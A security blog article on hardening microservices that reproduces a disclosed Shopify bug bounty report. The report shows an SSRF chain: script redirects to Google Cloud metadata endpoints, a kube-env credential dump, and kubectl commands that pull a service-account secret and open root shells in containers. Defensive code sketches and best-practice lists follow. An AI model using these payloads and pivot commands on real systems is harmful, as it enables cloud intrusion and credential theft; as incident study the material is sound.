How to Secure Your Microservices — Shopify Case Study

Learn why securing your microservices matters and how to prevent breaches like the one at Shopify.

For large infrastructures, microservice security is of paramount importance because of the large attack surface the services present. This article covers the core concepts of keeping microservices secure in a production environment in order to prevent breaches, and outlines a few practical techniques and practices you can adopt to reach that goal.

We will also study Shopify's case, in which containers in part of their infrastructure were compromised through a single entry point: cloud server instance metadata that was reachable through a vulnerable service. The issue was disclosed by mutual agreement between the reporter and Shopify. From that incident, we will try to learn best practices to apply in our own microservices development and deployment.

Overview

Let's start with a brief overview of the microservices architecture and the challenges it brings. Together, these introduce a wide range of security issues into the development cycle, and those issues may persist in the deployed production application as well.

Salient Points About Microservices in General

  • Decoupled components
  • Increased complexity
  • Immutable architecture
  • Shorter development timeframes and lifetime
  • Minimize dependencies and shared concerns
  • Small and focused
  • Data contracts (or not) between related services
  • Less commitment to a specific technology or stack
  • Good integration tests to avoid fragility as well as security issues

Security issues may also be developer-induced, brought about by a lack of awareness of AppSec or of general application security norms. Complexity also increases because of factors such as:

  • Segmentation and isolation
  • Multi-cloud deployments, and thus a greater number of assets to secure
  • Identity management and access control
  • Data/message integrity
  • Rapid rate of change, deprecation cycle

The increased complexity of a microservices architecture, with its larger number of services and assets, leads to a larger potential attack surface and thus greater risk. Mitigation requires periodic reviews of existing implementations as well as regular security audits. The challenges listed above therefore need to be addressed in the course of development and deployment.

AppSec for Microservices

AppSec (application security) is of prime importance because even a single breach can cost a large organization millions. However, many companies rely solely on automated vulnerability scanners and passive threat modeling to detect security misconfigurations and to test their microservices-based applications. Passive and automated testing alone don't suffice in a real-world context; one also needs to follow application security best practices throughout development and deployment.

In the information security industry, new exploits for widely used frameworks are discovered and developed all the time. Should that be a cause for concern for us? The answer is yes and no: it depends on a number of factors, mainly how you deployed and configured your microservices and whether you followed a standard set of best practices during development. Case studies of these exploits and vulnerabilities suggest that many of them center on a few configuration-based security problems, where developers who are barely aware of security best practices make basic configuration mistakes that carry over into the production application.

Hence, a slight mistake on your part can have a huge impact, given the overall attack surface and the number of exploits being developed. This is why we should keep abreast of best practices for microservices security, which form a significant part of the AppSec discipline an organization must adopt and practice.

Below are a few techniques and best practices to follow during microservices development and deployment so that the application remains secure, and conforms to industry security best practices, while in production.

Continuous Security

Ignoring security comes at a large cost. The goal of continuous security is to reduce overall expense and overhead while securing the microservices or application by testing their security periodically. Rather than relying only on passive threat modeling, adopt continuous security and follow application security best practices as they evolve. This means practicing DevSecOps, testing security continuously, and running both internal and external audits that approach the system from different attacker perspectives, analyzing how the microservices might be compromised so that problems are found and fixed beforehand.

Regular security audits are a must to cover the finer aspects and to confirm that your microservices follow best practices and stay as secure as possible.

Methods

  1. Internal testing (mainly post-exploitation)
  2. External testing

Below, we discuss how to put the goals of continuous security outlined above into practice.

Case Study (Shopify)

Let's examine a real-world scenario that affected Shopify's microservice-based architecture before moving on to the best practices.

"Shopify infrastructure is isolated into subsets of infrastructure. @0xacb reported it was possible to gain root access to any container in one particular subset by exploiting a server side request forgery bug in the screenshotting functionality of Shopify Exchange. Within an hour of receiving the report, we disabled the vulnerable service, began auditing applications in all subsets and remediating across all our infrastructure. The vulnerable subset did not include Shopify core. After auditing all services, we fixed the bug by deploying a metadata concealment proxy to disable access to metadata information. We also disabled access to internal IPs on all infrastructure subsets. We awarded this $25,000 as a Shopify Core RCE since some applications in this subset do have access to some Shopify core data and systems."

The above was Shopify's statement on the HackerOne report submitted to its bug bounty program.

From this report, we can conclude that even application-side vulnerabilities can lead to a server compromise. The attack was not particularly difficult to carry out: the reporter leveraged a fairly simple SSRF vulnerability to leak instance metadata from Google Cloud Platform, including Kubelet credentials, and thereby gained root access to any container in the affected infrastructure subset.
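
One common application-level defense against SSRF is to refuse to fetch URLs that resolve to internal addresses. The following is a minimal sketch of that idea using only the Python standard library; the function names, the `resolver` parameter, and the `BLOCKED_HOSTS` set are assumptions made for illustration and do not describe Shopify's actual fix.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical blocklist of host names that should never be fetched for a user.
BLOCKED_HOSTS = {"metadata.google.internal"}


def resolve_host(host):
    """Default resolver: return the set of IP addresses a host name resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_safe_url(url, resolver=resolve_host):
    """Return True only for http(s) URLs whose host resolves to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower().rstrip(".")
    if host in BLOCKED_HOSTS:
        return False
    try:
        addresses = resolver(host)
    except OSError:
        return False  # unresolvable hosts are rejected
    if not addresses:
        return False
    for raw in addresses:
        try:
            address = ipaddress.ip_address(raw)
        except ValueError:
            return False
        # Rejects private, loopback, and link-local ranges such as 169.254.169.254.
        if not address.is_global:
            return False
    return True
```

A check like this only covers the URL the application is asked to fetch. In the Shopify case the request came from a redirect inside a page rendered by the screenshot service, so network-level controls (blocking access to internal IPs and the metadata server, as Shopify did) are still needed alongside it.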

The Shopify Exploit Chain

The Exploit Chain — Getting Root Access on All Shopify Instances

1 - Accessing Google Cloud Metadata

  • Create a store (partners.shopify.com)
  • Edit the template password.liquid and add the following content:
<script>
window.location="http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token";
// iframes don't work here because Google Cloud sets the `X-Frame-Options: SAMEORIGIN` header.
</script>


  • Go to https://exchange.shopify.com/create-a-listing and install the Exchange app
  • Wait for the store screenshot to appear on the Create Listing page
  • Download the PNG and open it using image editing software or convert it to JPEG (Chrome displays a black PNG)

{F289082}

Exploiting SSRFs in Google Cloud instances requires a special header. However, I found a really easy way to "bypass" it while reading the documentation: the /v1beta1 endpoint is still available, does not require the Metadata-Flavor: Google header and still returns the same token.

I tried to leak more data, but the web screenshot software wasn't producing any images for application/text responses. However, I found that I could add the parameter alt=json to force application/json responses. I managed to leak more data, such as an incomplete list of SSH public keys (including email addresses), the project name (█████), the instance name and more:

<script>
window.location="http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json";
</script>

{F289081}

Can I add my SSH key using the leaked token? No.

curl -X POST "https://www.googleapis.com/compute/v1/projects/███/setCommonInstanceMetadata" -H "Authorization: Bearer ██████████████" -H "Content-Type: application/json" --data '{"items": [{"key": "0xACB", "value": "test"}]}'


{
 "error": {
  "errors": [
   {
    "domain": "global",
    "reason": "forbidden",
    "message": "Required 'compute.projects.setCommonInstanceMetadata' permission for 'projects/███████'"
   },
   {
    "domain": "global",
    "reason": "forbidden",
    "message": "Required 'iam.serviceAccounts.actAs' permission for 'projects/███████'"
   }
  ],
  "code": 403,
  "message": "Required 'compute.projects.setCommonInstanceMetadata' permission for 'projects/████████'"
 }
}

I checked the scopes for this token and there was no read/write access to the Compute Engine API:

curl "https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=██████████████████"


{
 "issued_to": "███████",
 "audience": "███",
 "scope": "https://www.googleapis.com/auth/cloud-platform",
 "expires_in": 1307,
 "access_type": "offline"
}


2 - Dumping kube-env

I created a new store and pulled attributes from this instance recursively: http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json

Result:
{F289455}

Metadata concealment is not enabled, so the kube-env attribute is available.
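
To make the idea of concealing metadata concrete, here is a simplified sketch of a request filter that could sit in front of a metadata server. It is an illustration under stated assumptions, not GKE's metadata concealment implementation: the function name, the `SENSITIVE_SEGMENTS` set, and the rule that rejects recursive queries are all hypothetical.

```python
from urllib.parse import parse_qs, urlsplit

# Hypothetical list of metadata path segments that workloads should never read.
SENSITIVE_SEGMENTS = {"kube-env"}
# Only the current API version is allowed; legacy paths such as v1beta1 are refused.
ALLOWED_PREFIX = "/computeMetadata/v1/"


def allow_metadata_request(target, headers):
    """Return True if a metadata request (path plus query string) may be forwarded."""
    normalized = {name.lower(): value for name, value in headers.items()}
    # Requests without the Metadata-Flavor header are likely forged (for example via SSRF).
    if normalized.get("metadata-flavor") != "Google":
        return False
    parts = urlsplit(target)
    if not parts.path.startswith(ALLOWED_PREFIX):
        return False
    segments = [segment for segment in parts.path.split("/") if segment]
    if any(segment in SENSITIVE_SEGMENTS for segment in segments):
        return False
    # Recursive listings would include the sensitive attributes, so refuse them too.
    query = parse_qs(parts.query)
    if query.get("recursive", ["false"])[0].lower() == "true":
        return False
    return True
```

With these rules, each of the requests used in the report (the v1beta1 token endpoint, the recursive attribute dump, and the direct kube-env read) would be rejected, while an ordinary v1 request carrying the header would pass.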

Since the image is cropped, I made a new request to http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json in order to see the rest of the Kubelet certificate and the Kubelet private key.

Result:
{F289456}

ca.crt

-----BEGIN CERTIFICATE-----
██████
███████
███████
████████
██████████████
████████
████████
███████
████
██████
███
█████████
████
████
████████
███████
███
-----END CERTIFICATE-----

client.crt

-----BEGIN CERTIFICATE-----
█████
███████
██████
████████
██████████
█████
██████
█████
█████
██████████
███████
█████
████
████
████████
████████
-----END CERTIFICATE-----

client.pem

-----BEGIN RSA PRIVATE KEY-----
█████████
██████
████████
████
████
█████████
██████████
██████
████████
█████████
██████
██████████
███
██████████
███
██████
█████████
████████
██████████
█████████
████
████
████████
████
███████
-----END RSA PRIVATE KEY-----

MASTER_NAME: █████

3 - Using Kubelet to Execute Arbitrary Commands

It's possible to list all pods {F289460}:

$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://██████ get pods --all-namespaces

NAMESPACE                                   NAME                                                              READY     STATUS             RESTARTS   AGE
████████                    ██████████                    1/1    

And create new pods as well:

$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://████████ create -f https://k8s.io/docs/tasks/debug-application-cluster/shell-demo.yaml

pod "shell-demo" created
$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://██████████ delete pod shell-demo

pod "shell-demo" deleted

I didn't try to delete running pods, obviously, so I'm not sure whether I would be able to delete them as user ████████. However, it's not possible to execute commands in this new pod or any other pod:

$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://█████████ exec -it shell-demo -- /bin/bash

Error from server (Forbidden): pods "shell-demo" is forbidden: User "███" cannot create pods/exec in the namespace "default": Unknown user "███"

The get secrets command doesn't work, but it's possible to describe a given pod and then get the secret using its name. That's how I leaked the kubernetes.io service account token using the instance ████ from the namespace ████:

$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://███ describe pods/█████ -n █████████

Name:           ████████
Namespace:      ██████
Node:           ██████████
Start Time:     Fri, 23 Mar 2018 13:53:13 +0000
Labels:         █████
                ████
                █████
Annotations:    <none>
Status:         Running
IP:             █████████
Controlled By:  █████
Containers:
  default-http-backend:
    Container ID:   docker://███
    Image:          ██████
    Image ID:       docker-pullable://█████
    Port:           ████/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Sun, 22 Apr 2018 03:23:09 +0000
    Last State:     Terminated
      Reason:       Error
      Exit Code:    2
      Started:      Fri, 20 Apr 2018 23:39:21 +0000
      Finished:     Sun, 22 Apr 2018 03:23:07 +0000
    Ready:          True
    Restart Count:  180
    Limits:
      cpu:     10m
      memory:  20Mi
    Requests:
      cpu:        10m
      memory:     20Mi
    Liveness:     http-get http://:███/healthz delay=30s timeout=5s period=10s #success=1 #failure=3
    Environment:  <none>
    Mounts:
      ██████
Conditions:
  Type           Status
  Initialized    True
  Ready          True
  PodScheduled   True
Volumes:
 ██████████:
    Type:        Secret (a volume populated by a Secret)
    SecretName: ███████
    Optional:    false
QoS Class:       Guaranteed
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute for 300s
                 node.kubernetes.io/unreachable:NoExecute for 300s
Events:          <none>


$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://██████ get secret ███████ -n ███████ -o yaml

apiVersion: v1
data:
  ca.crt: ██████████
  namespace: ████
  token: ██████████==
kind: Secret
metadata:
  annotations:
    kubernetes.io/service-account.name: default
    kubernetes.io/service-account.uid: ████
  creationTimestamp: 2017-01-23T16:08:19Z
  name:█████
  namespace: ██████████
  resourceVersion: "115481155"
  selfLink: /api/v1/namespaces/████████/secrets/████
  uid: █████████
type: kubernetes.io/service-account-token
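
The values under `data` in a Kubernetes Secret are base64-encoded, not encrypted, so anyone who can read the Secret can recover the token. A minimal sketch of the decoding step follows; the helper name and the placeholder values are invented for illustration and are not taken from the report.

```python
import base64


def decode_secret_data(data):
    """Decode every base64 value in a Secret's `data` mapping to text."""
    return {key: base64.b64decode(value).decode("utf-8") for key, value in data.items()}


# Placeholder Secret content (hypothetical values, not real credentials).
example_data = {
    "namespace": base64.b64encode(b"default").decode("ascii"),
    "token": base64.b64encode(b"header.payload.signature").decode("ascii"),
}

decoded = decode_secret_data(example_data)
print(decoded["namespace"])
print(decoded["token"])
```

This is why read access to Secrets should be restricted as tightly as the credentials they contain.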

And finally, it's possible to use this token to get a shell in any container:

$ kubectl --certificate-authority ca.crt --server https://████ --token "█████.██████.███" exec -it w█████████ -- /bin/bash

Defaulting container name to web.
Use 'kubectl describe pod/w█████████' to see all of the containers in this pod.
███████:/# id
uid=0(root) gid=0(root) groups=0(root)
█████:/# ls
app  boot   dev  exec  key  lib64  mnt  proc  run   srv  start  tmp  var
bin  build  etc  home  lib  media  opt  root  sbin  ssl  sys    usr
███████:/# exit


$ kubectl --certificate-authority ca.crt --server https://███████ --token "█████.██████.█████████" exec -it ████████ -n ████████ -- /bin/bash

Defaulting container name to web.
Use 'kubectl describe pod/█████ -n █████' to see all of the containers in this pod.
root@████:/# id
uid=0(root) gid=0(root) groups=0(root)
root@████:/# ls
app  boot   dev  exec  key  lib64  mnt  proc  run   srv  start  tmp  var
bin  build  etc  home  lib  media  opt  root  sbin  ssl  sys    usr
root@█████:/# exit

Huge thanks to Luís Maia (0xfad0) for helping me build this █████

Impact

CRITICAL

The hacker selected the Server-Side Request Forgery (SSRF) weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:

Can internal services be reached bypassing network access control?

Yes.

What internal services were accessible?

Google Cloud Metadata.

Security Impact:

RCE.

Best Practices to Keep Your Microservices Safe

As learned from Shopify's case:

  • User identity management, authorization, and access controls. Setting proper access controls and user authorization should be our first priority. OAuth2 can be used to control user authorization, and access controls can limit the scope of access and permissions for different user groups as needed. Third-party services can also be used here. JWT (JSON Web Token) based authentication is an option, and JJWT is a good library for it. SSO can be implemented as well, and for authentication, SAML and LDAP can be used depending on the use case and feasibility.
  • Enabling 2FA (two-factor authentication) with TOTP (time-based one-time passwords). This is a good additional practice. It acts as a second line of defense against exploits that bypass the first authentication step, for example through vulnerabilities in JWT handling or in the libraries used for authorization. The GoogleAuth library can be used for this purpose.
  • Never store sensitive data in plain text. For encrypting and decrypting data, libsodium is a good option. Also avoid newer, experimental, or customized encryption algorithms that sometimes come bundled with frameworks; they may contain vulnerabilities that are unknown or only lesser known.
  • Use an API gateway and isolate resources. Various third-party API gateways can be used for this purpose.
  • Isolation of APIs and internal components to reduce the exposed attack surface.
  • For REST API security, keep up with the OWASP Top 10, which is revised periodically after a thorough review. APIs may suffer from SSRF, which we discussed in Shopify's case and which can even lead to RCE if not handled properly. These are largely the same common vulnerabilities found in web apps.
  • When deploying to a cloud platform, configure account and instance access controls before deployment. Metadata for server instances is often left accessible. Similarly, AWS S3 buckets that belong to a particular microservice may be left public; use ACLs to prevent them from being publicly listed. In Shopify's case, the attacker reached sensitive metadata for server instances and leveraged it into root access.
  • Protect against common serialization and deserialization vulnerabilities and SQL injection (SQLi). Note that unsafe deserialization can lead to many critical vulnerabilities, including RCE. If a vendor fix isn't available, a hotfix that escapes and properly sanitizes user input can be implemented; for example, Kryo had a deserialization vulnerability which wasn't fixed.
    • Spark SQL
    • Kafka + Spark Serialization
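
To show what the TOTP second factor mentioned in the list above involves, here is a minimal standard-library sketch of RFC 6238 code generation and verification. It is an illustration rather than a replacement for a maintained library; the function names and the one-step drift window are assumptions.

```python
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the counter, then dynamic truncation."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, at=None, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter derived from the Unix time."""
    now = time.time() if at is None else at
    return hotp(secret, int(now // step), digits)


def verify_totp(secret, submitted, at=None, step=30, window=1):
    """Accept a code from the current time step or `window` steps either side."""
    now = time.time() if at is None else at
    for drift in range(-window, window + 1):
        moment = now + drift * step
        if moment < 0:
            continue
        expected = totp(secret, at=moment, step=step)
        # Constant-time comparison avoids leaking how many digits matched.
        if hmac.compare_digest(expected.encode(), submitted.encode()):
            return True
    return False
```

In a real deployment the shared secret would be generated per user and stored encrypted, and used codes would be tracked so that a code cannot be replayed within its validity window.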

Ways to handle authentication of APIs (frameworks and services):

  • Authentication
    • Cognito + AWS API Gateway to handle the heavy lifting
      • Cognito handles authenticating with credentials, MFA, etc.
      • API Gateway checks your access token or JWT (meh) and grants access
    • Perform role-based restrictions across services
    • Each request is signed, which provides an additional layer of authentication
    • Integrate Lambda functions for pre/post processing hooks
  • Never store sensitive keys and other secrets in environment variables. In certain cases these can be exposed via application logs or accessed unintentionally by other services, which makes them unsafe.
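
The point in the list above that each request is signed can be illustrated with a simplified HMAC scheme. This sketch is not AWS Signature Version 4 or any specific gateway's protocol; the message layout, function names, and the 300-second skew limit are assumptions chosen for the example.

```python
import hashlib
import hmac


def sign_request(key, method, path, body, timestamp):
    """Return a hex HMAC-SHA256 signature over method, path, timestamp, and body hash."""
    message = b"\n".join([
        method.upper().encode(),
        path.encode(),
        str(timestamp).encode(),
        hashlib.sha256(body).hexdigest().encode(),
    ])
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_request(key, method, path, body, timestamp, signature, now, max_skew=300):
    """Check freshness first, then compare signatures in constant time."""
    if abs(now - timestamp) > max_skew:
        return False  # stale or future-dated requests are rejected to limit replay
    expected = sign_request(key, method, path, body, timestamp)
    return hmac.compare_digest(expected.encode(), signature.encode())
```

A caller would compute the signature with a key shared between the two services and send it with the timestamp in request headers; the receiving service recomputes it and rejects the request on any mismatch.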
